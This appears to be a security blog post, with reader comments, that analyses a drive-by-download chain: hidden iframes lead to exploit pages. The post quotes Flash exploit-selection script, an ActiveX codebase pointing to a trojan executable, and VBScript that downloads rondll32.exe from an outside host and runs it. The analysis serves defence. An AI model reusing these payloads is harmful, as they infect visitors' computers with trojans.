jjmaobuduo.3322.org/csrss/w.js

a new round of attacks have  started.
w.js contains iframe src from http://www.plgou.com/csrss/htm.htm
htm.htm contains iframes from

  • <iframe src=flash.htm width=100 height=0></iframe>
  • <iframe src=06014.html width=100 height=0></iframe>
  • <iframe src=yahoo.htm width=100 height=0></iframe>
  • <iframe src=office.htm width=100 height=0></iframe>
  • <iframe src=ksx.htm width=100 height=0></iframe>

flash.htm calls i1.html if browser is MSIE, else call f2.html (presumably firefox). Depending on the flashplay version the respective flash exploit is retrieved:

var version=deconcept.SWFObjectUtil.getPlayerVersion();if(version['major']==9){document.getElementById('flashversion').innerHTML="";if(version['rev']==115){var so=new SWFObject("./i115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==64){var so=new SWFObject("./i64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==47){var so=new SWFObject("./i47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==45){var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==28){var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==16){var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']>=124){if(document.getElementById){document.getElementById('flashversion').innerHTML=""}}}
document.write("")

Interesting content for ksx.htm:
<object classid="clsid:7E0CDEE7-DC80-4F37-9410-790BB5E9270E" codebase="http://www.plgou.com/csrss/rondll32.exe#version=1,0,0,1" width="800" height="191"></object>

infrequently used clsid for downloading trojan.

office.htm contains snapshot viewer exploit.

yahoo.htm uses exploits Yahoo Messenger to download trojan:

<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
test.GetFile "http://www.plgou.com/csrss/rondll32.exe","c:\\msyahoo.exe",5,1,"ti
any"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run"c:\\msyahoo.exe"
</script>

Advertisements

4 Responses to “jjmaobuduo.3322.org/csrss/w.js”

  1. Do you have any information about what each of these trojans do?

  2. 06014.html is 06014.htm . this is hackers mistake 🙂

  3. the analysis of rondll32.exe is here

  4. rondll32.exe will go out and grab ack.htm.
    ack.htm downloads 4 executables:
    beauty.exe
    sss.exe
    sl.exe
    fengxiang.exe

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: